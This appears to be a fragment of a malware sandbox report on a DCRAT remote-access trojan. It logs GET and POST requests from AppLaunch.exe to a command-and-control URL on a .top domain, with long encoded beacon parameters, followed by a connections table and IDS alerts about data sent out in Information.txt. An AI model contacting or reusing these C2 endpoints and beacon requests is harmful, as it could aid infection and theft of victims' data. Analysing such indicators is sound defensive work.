2528 | AppLaunch.exe | GET | 200 | 91.103.252.23:80 | http://232161cm.nyashtyan.top/nyashsupport.php?XbCBSR8yH2mzUNXYzm6RL6AS9OcNZh=POGTQits&9tVsuCZCGlp4pbuabuCDyuYjoXkO3H=G39SckRh7yaHy2TkwV3zxqpIOUv&ab5fe381e05cacaa8baa42b5bd758fb2=wMyQTO4gDM4ETNxETZ5YmYyIzN5EjMxUjZkBTM1UzMwYGZkdjYjVjNwAzM5EDO5IjMxIjNwczM&d5482f6c998a081ff9fb48bcf2314cee=QMjNmMmRmZygTZhhDO4EmYwYmMkVTZxMzNyMjNwkTNmFTOwIDZiJGZ&f880b0002f0d31bf8f02966baf29f836=d1nIwUmM0UWN1gTNyUDMwMTYiJzNmRTZhRzY1YGMkBzYwQDNiRjZ0U2M3IiOiQ2M2UjMzIDMkJTMwATNlJWM3M2MidzM1kjY5gTZ2gDMiwiIkRmYzUmM0cjY1QzYzQmZxETO1YmY0UDZycDOxQjMwEjNlhDNyYzY1IiOiMDNhJjMyQDMhJTN2EDOzkDZ5gTO1Y2YjVjYzMWYyYTZis3W&9d6e5ec8163599a3d65acf9be9ad08a4=d1nIiojIlNWN4YjM2MDZhV2YhhTNhljNhlTM2ATZklDZjJjNmJmIsICMlJDNlVTN4UjM1ADMzEmYycjZ0UWY0MWNmBDZwMGM0QjY0YGNlNzNiojIkNjN1IzMyADZyEDMwUTZiFzNjNjY3MTN5IWO4UmN4AjIsICZkJ2MlJDN3IWN0M2MkZWMxkTNmJGN1QmM3gTM0IDMxYTZ4QjM2MWNiojIzQTYyIjM0ATYyUjNxgzM5QWO4kTNmN2Y1I2MjFmM2UmI7xSfiADWmlGOqlkNJNUT0E1VOtmUH1EeBpWTxcGVPxmTXl1akpmW3V1RPxmRX1EaOpnT6lFRP1mWE5UNFRkWzEEVNl2cu9UaFdEZoJVRkRjVtl0cVp2TpFFWkZnVXJGcSZ0YsZ1RiRlSDxUaV1GZwJ1MZJkSp9UaNhFZwY0RkRFbIRGcahVYw40VRl2dplUavpWSzkzRaVHbyYVVOVVUpdXaJ9kSp9UawcVWqp0VahlTYFWa3lWSapUaPlWVtJmdod0Y2p0MZBXMwMGcKNETptWeNd2YtJGcCh0YsJ1MVdWUU10Z3dlWrlzVUdWWElUN4dVY0ZUbSdWUq5URxUVUvFUallEZF10M0kWTnFURJZlQxE1ZBRUTwkFVMFzaHlEcwUkVvVVbjZnTFlEcJZ0SzZ1RkVHbrlkNJNlW0ZUbUZlQxEVa3lWSwVEMM9EaDlUeWdEZ3Z0RaJkQ5NmasdUY3ZUbjhkQTFFSaZUSrpEWZtWNXlFMOxWS2k0UaRnRtRlVCFjUpdXaJ9kSp9Ua0cVY0J1VRpHbtl0cJN0cRhVWwI1R50WUMl2TpNWVRVlSDxUaRhVYDJ0QOJTQDJGa1IjYw50MjxmWyIWeCZUSzEUejNTOHpVdsJjVp9maJlnVtZVdsJjVpd3UmlGNXF2cKhlWDlzUadXOtNWMWtWS2k0UaVXOtVGbxcVYwo0QMlWQE10dBRUT3lUaPl2dXlFMONjY3p0QMl2auJGax02YsRWRJRXQDpFbs1mWw50VadnTIlEM50GVp9maJ5mSzIWa3lWS6dmeOdHNT1Ee3lnT5VFROV3aE5UavpWSqlzRil2dplkRStWS2k0UllnUuJWM5ITWpdXaJhGbtNGaahVWDpUaPlGNyIGckdlW5p0QMl2YtNGbKdlYspEWk9kSp9UarhEZw5UbJNXST5Ue0kmT6RzQNpHNp1EeJpWS2k0QjBnS5VmNJlnYtVzVTdHbrl0cJlmYwFzRahmSp9UaVdlYoVzajxmTYZVa3lWSEJkVMNlVwUlVKl2TpV1VihWNwEVUKNETplkeNVXVqxEMJl2TplEWadlSYplMKhlWUp0QMlWT5FVavpWSsJEWlVlSYplMKhlWUpUelJiOiU2Y1gjNyYzMkFWZjFGO1EWO2EWOxYDMlRWOkNmM2YmYiwiI4YjM4UWMiZzNkBzMmZzM2EWY2MDN4ITNjV2N4QDM5gDNlNDOxQzYzIiOiQ2M2UjMzIDMkJTMwATNlJWM3M2MidzM1kjY5gTZ2gDMiwiIkRmYzUmM0cjY1QzYzQmZxETO1YmY0UDZycDOxQjMwEjNlhDNyYzY1IiOiMDNhJjMyQDMhJTN2EDOzkDZ5gTO1Y2YjVjYzMWYyYTZis3W | unknown | text | 104 b | unknown |
2528 | AppLaunch.exe | GET | 200 | 91.103.252.23:80 | http://232161cm.nyashtyan.top/nyashsupport.php?XbCBSR8yH2mzUNXYzm6RL6AS9OcNZh=POGTQits&9tVsuCZCGlp4pbuabuCDyuYjoXkO3H=G39SckRh7yaHy2TkwV3zxqpIOUv&ab5fe381e05cacaa8baa42b5bd758fb2=wMyQTO4gDM4ETNxETZ5YmYyIzN5EjMxUjZkBTM1UzMwYGZkdjYjVjNwAzM5EDO5IjMxIjNwczM&d5482f6c998a081ff9fb48bcf2314cee=QMjNmMmRmZygTZhhDO4EmYwYmMkVTZxMzNyMjNwkTNmFTOwIDZiJGZ&9d6e5ec8163599a3d65acf9be9ad08a4=QX9JSUNJiOiU2Y1gjNyYzMkFWZjFGO1EWO2EWOxYDMlRWOkNmM2YmYiwiI2YjZ4czNwEDOmRTYzYGNxUDO4YWYmZjZzIWZ0UTZxQTYiNjYiBDZzIiOiQ2M2UjMzIDMkJTMwATNlJWM3M2MidzM1kjY5gTZ2gDMiwiIkRmYzUmM0cjY1QzYzQmZxETO1YmY0UDZycDOxQjMwEjNlhDNyYzY1IiOiMDNhJjMyQDMhJTN2EDOzkDZ5gTO1Y2YjVjYzMWYyYTZis3W | unknown | text | 104 b | unknown |
2528 | AppLaunch.exe | POST | 200 | 91.103.252.23:80 | http://232161cm.nyashtyan.top/nyashsupport.php?XbCBSR8yH2mzUNXYzm6RL6AS9OcNZh=POGTQits&9tVsuCZCGlp4pbuabuCDyuYjoXkO3H=G39SckRh7yaHy2TkwV3zxqpIOUv&ab5fe381e05cacaa8baa42b5bd758fb2=wMyQTO4gDM4ETNxETZ5YmYyIzN5EjMxUjZkBTM1UzMwYGZkdjYjVjNwAzM5EDO5IjMxIjNwczM&d5482f6c998a081ff9fb48bcf2314cee=QMjNmMmRmZygTZhhDO4EmYwYmMkVTZxMzNyMjNwkTNmFTOwIDZiJGZ | unknown | text | 104 b | unknown |
PID | Process | IP | Domain | ASN | CN | Reputation |
|---|---|---|---|---|---|---|
4 | System | 192.168.100.255:137 | — | — | — | whitelisted |
1208 | svchost.exe | 239.255.255.250:1900 | — | — | — | whitelisted |
4 | System | 192.168.100.255:138 | — | — | — | whitelisted |
332 | svchost.exe | 224.0.0.252:5355 | — | — | — | unknown |
2528 | AppLaunch.exe | 91.103.252.23:80 | 232161cm.nyashtyan.top | Hostglobal.plus Ltd | GB | unknown |
Domain | IP | Reputation |
|---|---|---|
232161cm.nyashtyan.top |
| unknown |
PID | Process | Class | Message |
|---|---|---|---|
332 | svchost.exe | Potentially Bad Traffic | ET DNS Query to a *.top domain - Likely Hostile |
2528 | AppLaunch.exe | A Network Trojan was detected | ET MALWARE DCRAT Activity (GET) |
2528 | AppLaunch.exe | Potentially Bad Traffic | ET INFO HTTP Request to a *.top domain |
2528 | AppLaunch.exe | A Network Trojan was detected | ET HUNTING Observed Malicious Filename in Outbound POST Request (Information.txt) |